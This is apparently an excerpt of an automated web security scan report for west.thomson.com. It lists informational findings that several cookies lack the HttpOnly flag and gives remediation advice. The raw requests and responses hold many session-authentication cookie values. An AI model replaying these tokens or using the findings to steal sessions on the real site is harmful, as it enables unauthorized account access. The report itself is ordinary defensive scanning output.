If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
6.1. http://west.thomson.com/Error/500Error.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/Error/500Error.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=6C2776260A06E0DA7E316662F35CD801FB1884F55F2D184C53D0D2F4AA981F1850DC4F54B455CC740DE6A3A61A343349F17598FFF202335A75BD6FA9930A4102F07FA82899CA9DF3ECE6D45B7DFB1136EF60AAF3D1093EB92D363DEDF846159C5EEA4B2C6654B511316A827828B49D7A8F4BAA567EE0AC56D57D345784960460228A95779E1C4391520F348B9037D5ACF439811F80B15F5EFC008F6F0846F5E0EA79BF17D2624B6A8E054DB0507FE036C08288195B48FA84DF92A90D2ACAFF0CE9218C7C1D32DDD289B076CE7A75DDDCC337F829198E1CBF95448E9FD984AE5899980BD9; path=/
Request
GET /Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx HTTP/1.1/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=15EB1E2BD55FB642DEFDF69E45C933941D077548D9E77F5DFD86AFA9231864655A2D3B0A5DA53C12ECD77027BFA162DFE1C25838CD6ED0BA7EA11DF766E81FF9BE80932A802690C8D89CCD970BFE43D957372263E299FCB576D90CB191BE9C03BFA81FE18D6C1ABC185B6A95A9C3FE7C6D15760BFC5FE4F3A675D865307B7D2C00D2ADADD2A8C8C503C9A225B6F3DB06817479DC6714AA5F037A2AE2E40D4090AC151A6DF079A011C7D783412F0443C1E4CC8EA514A71C6F69B68B045D51D4F25992FD629E534853F1810AB486114ECE9F7CA350D4192436BFB8E836202640C7A7A9CEA9
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=6C2776260A06E0DA7E316662F35CD801FB1884F55F2D184C53D0D2F4AA981F1850DC4F54B455CC740DE6A3A61A343349F17598FFF202335A75BD6FA9930A4102F07FA82899CA9DF3ECE6D45B7DFB1136EF60AAF3D1093EB92D363DEDF846159C5EEA4B2C6654B511316A827828B49D7A8F4BAA567EE0AC56D57D345784960460228A95779E1C4391520F348B9037D5ACF439811F80B15F5EFC008F6F0846F5E0EA79BF17D2624B6A8E054DB0507FE036C08288195B48FA84DF92A90D2ACAFF0CE9218C7C1D32DDD289B076CE7A75DDDCC337F829198E1CBF95448E9FD984AE5899980BD9; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
6.2. http://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/GlobalBackgroundStyles.5.1.421.22.ashx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=3667CA2CB117C94ADECD50E499D4EDE1366407401A3598A477013BCC111A6335E05A67E843D1F884F0C9398D85BF1686D0E9BCB5086219D99FCDCE2ADC2FB0A84E01F186A93B4957BE85B30D4496BFD0D48B8EF387C0ACBC4F73AD17BFEA9716AFDF2F1CC3A9B6A6BA789AC7850448A29F3AD380ABE8889A93C6A7D9211EDBC4A03E0158FA1FE7EA2FA10B7BC09EDEF28EEBF0AE10B4B02FF794D2174CB8357953BC7456E086AB13B74C0DB0B45285DB466E9BBEAA903532C4CA13AAA4F125BD1BF9FD8F66A02A3C5683A6EFFADC2BB7C5E22538F2EA0F311441895BE800281D8EFFEFFD; path=/
Request
GET /GlobalBackgroundStyles.5.1.421.22.ashx HTTP/1.1/Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=379C798BB6DB949F9D4A346BDE9CE9B5C67507F974B079B908D5CC4F50B716E23668FED21543CCD937ABCEC5BABC95E7A8A04A82B08CBA78B38904B0172EB264D0975D8951460E3F39E5A548BE29135C5EE63383975E7C1666D0F33D634C188771E5D34242D420AE62C4C52EE79EB8BC94605471249CA474DF3199E9B1A48D8F7BA7BA571F2FD7868EB807D530FDB93622631719B211AB540789E44C0D9D2D379F20E379EE936E20C5157A6C40EA14CACDA613FFC2F21CC1D45FFC4C22516F0B3428A615FBBD1CBE07EB1CF6D247061E809F200E183B04A593F90C71E2CEC27E92B94233
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=3667CA2CB117C94ADECD50E499D4EDE1366407401A3598A477013BCC111A6335E05A67E843D1F884F0C9398D85BF1686D0E9BCB5086219D99FCDCE2ADC2FB0A84E01F186A93B4957BE85B30D4496BFD0D48B8EF387C0ACBC4F73AD17BFEA9716AFDF2F1CC3A9B6A6BA789AC7850448A29F3AD380ABE8889A93C6A7D9211EDBC4A03E0158FA1FE7EA2FA10B7BC09EDEF28EEBF0AE10B4B02FF794D2174CB8357953BC7456E086AB13B74C0DB0B45285DB466E9BBEAA903532C4CA13AAA4F125BD1BF9FD8F66A02A3C5683A6EFFADC2BB7C5E22538F2EA0F311441895BE800281D8EFFEFFD; path=/ {background-image:url('http://images.west.thomson.com/organizations/headers/sidebar1.jpg');margin-top:2px;height:85px;width:241px}.Header_Org_SideBar2{background-image:url('http://...[SNIP]...
6.3. http://west.thomson.com/Register/CreateTransferToken.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/Register/CreateTransferToken.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=211BC1381863CE08F4F9C87068B139B8251FAC76DD6AC90F063CF465F26E2A0FEC3FF72E81E4D9C28915DAE7F8F14D0EA41186F8C3B5D8D9C71C3343C241730B23A636EFAF5EFC7EE964C170EE05135E66C101E83D9807BC578D84ED9F70BE29502B19857E099BB2E8D5DAD87C6CA096BC7B5ED409879FE387757B45FD3340903123415BB6DD41707E367AEFD73B9DCCBC2C5321D7A8F9351501697CA7DC1E8AD9C1B38DEFF7109DB9B139772A698CC58464F7EAE38858C5533E3A03746B1FD144CC129C67CB72E4ADC7E548A90C432EC6B9FD9EB6A13628659D313B626A7BE2FF49DF98; path=/
Request
GET /Register/CreateTransferToken.aspx?ReturnUrl=https%3a%2f%2fmyaccount.west.thomson.com%2fMyAccount%2fAccessControl%2fAccessControl%2fSignIn%3fReturnUrl%3dhttp%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D
Response
HTTP/1.1 302 Found.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=Set-Cookie: .WTCAUTH=211BC1381863CE08F4F9C87068B139B8251FAC76DD6AC90F063CF465F26E2A0FEC3FF72E81E4D9C28915DAE7F8F14D0EA41186F8C3B5D8D9C71C3343C241730B23A636EFAF5EFC7EE964C170EE05135E66C101E83D9807BC578D84ED9F70BE29502B19857E099BB2E8D5DAD87C6CA096BC7B5ED409879FE387757B45FD3340903123415BB6DD41707E367AEFD73B9DCCBC2C5321D7A8F9351501697CA7DC1E8AD9C1B38DEFF7109DB9B139772A698CC58464F7EAE38858C5533E3A03746B1FD144CC129C67CB72E4ADC7E548A90C432EC6B9FD9EB6A13628659D313B626A7BE2FF49DF98; path=/ >.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west...[SNIP]...
6.4. http://west.thomson.com/Signin.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/Signin.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=E918D4D2260DEC2CD20FC1C5FFF0E671EE7B189528DF19305A88156EB01A6A82FAC37FE5D350F40316CEC5BC97D53F1AD3389F681FB2C8146BFB611CF7E0887BB542716BA1EEB11BBE0CEDDFF03A30CD9F9D665CAB4998F4F91A8EE393883805901F3905B62C5BDCAEEDFBDB57EB288019C16708573EA26580E550ADB5B47513821B2D1905C11B4EF4446A90AE60C4BD7D347ABB5CAF90044FC4D155C0B707340F1A5074B4A15AFBFA364383CD7BF9133C1D13ECB306C0E3EEE6BEEE0F3ECD39657FF716849BEADE95F2F39D7F59B8E7E045D39DA16BF33BB47851C694AD5B570EE67EB5; path=/
Request
GET /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&PromCode=571423 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=
Response
HTTP/1.1 302 FoundngBasket.aspx?PromCode=571423Set-Cookie: .WTCAUTH=E918D4D2260DEC2CD20FC1C5FFF0E671EE7B189528DF19305A88156EB01A6A82FAC37FE5D350F40316CEC5BC97D53F1AD3389F681FB2C8146BFB611CF7E0887BB542716BA1EEB11BBE0CEDDFF03A30CD9F9D665CAB4998F4F91A8EE393883805901F3905B62C5BDCAEEDFBDB57EB288019C16708573EA26580E550ADB5B47513821B2D1905C11B4EF4446A90AE60C4BD7D347ABB5CAF90044FC4D155C0B707340F1A5074B4A15AFBFA364383CD7BF9133C1D13ECB306C0E3EEE6BEEE0F3ECD39657FF716849BEADE95F2F39D7F59B8E7E045D39DA16BF33BB47851C694AD5B570EE67EB5; path=/ >/ShoppingBasket.aspx?PromCode=571423">here</a>.</h2>
6.5. http://west.thomson.com/default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/default.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_id=0xhchh4dyhomfi1jfdhr2vqt; path=/ anonymous_userid_1={6eed97b3-02ac-4505-898e-74b46a092d39}; expires=Fri, 29-Apr-2011 20:02:52 GMT; path=/
Request
GET /default.aspx HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3
Response
HTTP/1.1 200 OK=0xhchh4dyhomfi1jfdhr2vqt; path=/; HttpOnlySet-Cookie: s_id=0xhchh4dyhomfi1jfdhr2vqt; path=/ Set-Cookie: anonymous_userid_1={6eed97b3-02ac-4505-898e-74b46a092d39}; expires=Fri, 29-Apr-2011 20:02:52 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]...
6.6. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/productdetail/160547/12484463/productdetail.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=F31052139A373540424741E268099E6241C09AA45A626DE2A38C22E931FE39A836ECA06504AB5E11D899AB974340AC3CA22EFA3BB0676F1C0B8373726AAD802F355075EA717D1B28441FC4F53A7328B7FD809F21298A2BB310E7B3E4873D669AB0C1DC219FC364772434FECA03988543E0C149CD8DC2D028D16CDF8B7C86EE82F6122626596B9EC5B4BD031E6A0CB5A74116B5FFAE079B9DC014893820F0EF5A0D46558FF9B020B1DB315FE28D9157A01B864D7CF4B3A9F4F24F0CF57722CEACF6E4E538CFC9886E21DFACDFB09725777C42B39CBFDE80E488D41C726AC1CBF53B9A1753; path=/
Request
GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=F31052139A373540424741E268099E6241C09AA45A626DE2A38C22E931FE39A836ECA06504AB5E11D899AB974340AC3CA22EFA3BB0676F1C0B8373726AAD802F355075EA717D1B28441FC4F53A7328B7FD809F21298A2BB310E7B3E4873D669AB0C1DC219FC364772434FECA03988543E0C149CD8DC2D028D16CDF8B7C86EE82F6122626596B9EC5B4BD031E6A0CB5A74116B5FFAE079B9DC014893820F0EF5A0D46558FF9B020B1DB315FE28D9157A01B864D7CF4B3A9F4F24F0CF57722CEACF6E4E538CFC9886E21DFACDFB09725777C42B39CBFDE80E488D41C726AC1CBF53B9A1753; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
6.7. http://west.thomson.com/store/AddItem.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/AddItem.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=2DCC7565792A93E4A3B59BB53EC980046A539A77646F3E66CEE29E96764D0E3D43BEABEC77DCD9D06A3B855725F304796FF8A93B7CB43D124601CB0B7784E132AD1318C4098179D9FF988AE1612D4821055B5299FC267D4A0ECC75BF5C374E33BB9BD6E99C4022323AEC0CC623BE2E0642475B1787F37713D3799E0D5F37923C3795B82BB20BE8541582F38EBC5EB9A0FB502FD588B06D4F113234D6C8CF4E575DD0C2720AABDA7085C8FFBA9E8AC7DFE1FBF721A679C0301D35FEF406BB79C026A4B5814EF29EDC9010AF0B98F42FC1B1DC9608476F9291428911E3CD22CC2A20B63708; path=/
Request
GET /store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internal HTTP/1.1/default.aspx,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c=undefinedDirect%20LoadDirect%20Load; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=; c_m2=1; SC_LINKS=default%5E%5Ehttp%3A//images.west.thomson.com/buttons/AddToCartSmall.gif%5E%5Edefault%20%7C%20http%3A//images.west.thomson.com/buttons/AddToCartSmall.gif%5E%5E; gpv_pn=default; s_sq=thwest%3D%2526pid%253Ddefault%2526pidt%253D1%2526oid%253Dhttp%25253A//west.thomson.com/store/AddItem.aspx%25253FProduct_id%25253D162495%252526MaterialNumber%25253D22061301%252526Product_type%25253D1%252526%2526ot%253DA
Response
HTTP/1.1 302 Found/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internalSet-Cookie: .WTCAUTH=2DCC7565792A93E4A3B59BB53EC980046A539A77646F3E66CEE29E96764D0E3D43BEABEC77DCD9D06A3B855725F304796FF8A93B7CB43D124601CB0B7784E132AD1318C4098179D9FF988AE1612D4821055B5299FC267D4A0ECC75BF5C374E33BB9BD6E99C4022323AEC0CC623BE2E0642475B1787F37713D3799E0D5F37923C3795B82BB20BE8541582F38EBC5EB9A0FB502FD588B06D4F113234D6C8CF4E575DD0C2720AABDA7085C8FFBA9E8AC7DFE1FBF721A679C0301D35FEF406BB79C026A4B5814EF29EDC9010AF0B98F42FC1B1DC9608476F9291428911E3CD22CC2A20B63708; path=/ >.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22...[SNIP]...
6.8. http://west.thomson.com/store/DOTD.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/DOTD.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=7084F0DB53EA84FCE39FA88CB58EB3E5BAA21F4EF0A8D74E802D354C8A86EB1283498887AD6D9A81749FC12498023FBB115363D33366D893085D3B9D8CA30A632885192F7B02829CB49F8540074CC75B43688EBF6E27857FBFE6BC70434A7A33315B77BFC224939D5A448883221E42D190032C6769F433D8BDB2667CA3D0A42DCEA57F2FB0C67C349B8DFC1D5CE43CDD611B73E9D22FC3953DF0F9D47930C2702DAD06D639C20AC8E5E8DBCA158D03B9351F297E798ED68A1BCAB64B5100436D8A1503A70469FE7353B444DE773A776F823EC7DD08144375EBE807B06789551B3C0F0BE6; path=/
Request
GET /store/DOTD.aspx?Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1/support/contact-us/default.aspx,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=710246AFEFD5447ED38F5ED9B6DB451F14F8B26AA20C1EA5DBE638293D8F732E280E7A50B4AAE6E88B805F045E901AAE55797344A7CDC11779DA3EE861D7A9AD5F18C6EE9DC5A86388AFD49F24F39132A970F0F140A1303A8756B759B648B752B9AD9DB6F1FE4702ED9F5ACF5613EC562177DA4F97DE1DA22A4283C84BADC41E1128330CB0E44D705CA165EDCD9E00B2D35AF4320C8DB08AF03089A794B677809D398CA82BD8CDA7A39315C9FA6DAF7AFC08722902D59D6CD8FD7ED954955F4C2B760DC92E3F238BFDBA70C3652CB3EA3F1156D47F06F5B24627AC03070163105A0B0E93; s_cc=true; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%5D; s_ppv=45; c_m2=1; c=undefinedkbportal.thomson.comkbportal.thomson.com; SC_LINKS=support%3Acontact-us%3Adefault%5E%5EDeal%20Of%20The%20Day%5E%5Esupport%3Acontact-us%3Adefault%20%7C%20Deal%20Of%20The%20Day%5E%5E; gpv_pn=support%3Acontact-us%3Adefault; s_sq=thwest%3D%2526pid%253Dsupport%25253Acontact-us%25253Adefault%2526pidt%253D1%2526oid%253Dhttp%25253A//west.thomson.com/store/DOTD.aspx%25253FProduct_id%25253D12484463%252526PromCode%25253D645229L86530%252526PromType%25253Dinternal%2526ot%253DA
Response
HTTP/1.1 302 Found?aspxerrorpath=/store/DOTD.aspxSet-Cookie: .WTCAUTH=7084F0DB53EA84FCE39FA88CB58EB3E5BAA21F4EF0A8D74E802D354C8A86EB1283498887AD6D9A81749FC12498023FBB115363D33366D893085D3B9D8CA30A632885192F7B02829CB49F8540074CC75B43688EBF6E27857FBFE6BC70434A7A33315B77BFC224939D5A448883221E42D190032C6769F433D8BDB2667CA3D0A42DCEA57F2FB0C67C349B8DFC1D5CE43CDD611B73E9D22FC3953DF0F9D47930C2702DAD06D639C20AC8E5E8DBCA158D03B9351F297E798ED68A1BCAB64B5100436D8A1503A70469FE7353B444DE773A776F823EC7DD08144375EBE807B06789551B3C0F0BE6; path=/ >.aspx?aspxerrorpath=/store/DOTD.aspx">here</a>.</h2>
6.9. http://west.thomson.com/store/secure/ShoppingBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/secure/ShoppingBasket.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:.WTCAUTH=5B554B6F6DD767F208B345EAA979222AFB75B1D39D5072C8AC8163224D602E4EA0791659ECC40EAA04995AD2414A1EF63E920C2406A52D5A77C772B7312571F0AAC96B34372DB47CEF38803A8D2B7154B70F6215558C4BE194B8F6631FFDBEECF7D4256904225BA30EA921CF83C914FF8CF103200841FE605F66B636573E74A9FE11E39E665181B5E833711454838B5B5EDDAB8E52F237C0742B8087456FDD46A9875A0BD3BE7D68841EDA7A916AA72ACAB0B687055A7BCB2C0B64F0382E8FCCEA3EEE09697283C17C482DF2DE2D55F26A8BD1E5F9CC9D2F12F213FCC63F2AE7AFD0ECCE; path=/
Request
GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=5B554B6F6DD767F208B345EAA979222AFB75B1D39D5072C8AC8163224D602E4EA0791659ECC40EAA04995AD2414A1EF63E920C2406A52D5A77C772B7312571F0AAC96B34372DB47CEF38803A8D2B7154B70F6215558C4BE194B8F6631FFDBEECF7D4256904225BA30EA921CF83C914FF8CF103200841FE605F66B636573E74A9FE11E39E665181B5E833711454838B5B5EDDAB8E52F237C0742B8087456FDD46A9875A0BD3BE7D68841EDA7A916AA72ACAB0B687055A7BCB2C0B64F0382E8FCCEA3EEE09697283C17C482DF2DE2D55F26A8BD1E5F9CC9D2F12F213FCC63F2AE7AFD0ECCE; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
